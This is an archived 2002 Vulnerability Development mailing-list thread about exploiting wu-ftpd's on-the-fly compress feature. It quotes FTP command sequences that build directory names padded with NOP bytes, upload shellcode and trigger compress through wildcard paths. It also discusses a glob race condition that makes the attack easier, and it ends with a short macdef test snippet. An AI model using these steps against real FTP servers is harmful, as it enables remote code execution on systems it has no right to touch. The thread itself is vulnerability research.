Vulnerability Development mailing list archives
Re: compress(vul) + ftpd(?)
From: Gushterul <emild () sinaia globtel ro>
Date: Tue, 12 Mar 2002 14:02:20 +0200 (EET)
You can test with macdef

macdef 1
get /*/*/*/*/1.Z

$1

Gushterul

On Mon, 11 Mar 2002, Pavel Kankovsky wrote:

> On Sat, 9 Mar 2002, H D Moore wrote:
>
> > ftp> mkdir A<254 * 0x90>
> > ftp> cd A*
> > [...]
> > ftp> put <reallysmallscode>
> > ftp> cd ../../../../
> > ftp> get A*/B*/C*/D*/reallysmallscode.Z
>
> Afaik this won't work because glob() does not expand the path unless a file matching the *complete* pattern exists. But if x.Z exists, "get x.Z" will not run compress.
>
> Fortunately, we do not get Catch 22 because there is a nice race condition there. To make things better, wu-ftpd appears to compute all filenames matching a pattern during wildcard expansion and drops everything but the first entry of the list afterwards, ie. it is possible to make the delay much longer and easier to exploit.
>
> > > BTW: This is an ANCIENT problem.
> >
> > You would think it would have been fixed by now ;)
>
> Oh really? ;)
>
> --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
> "Resistance is futile. Open your source code and prepare for assimilation."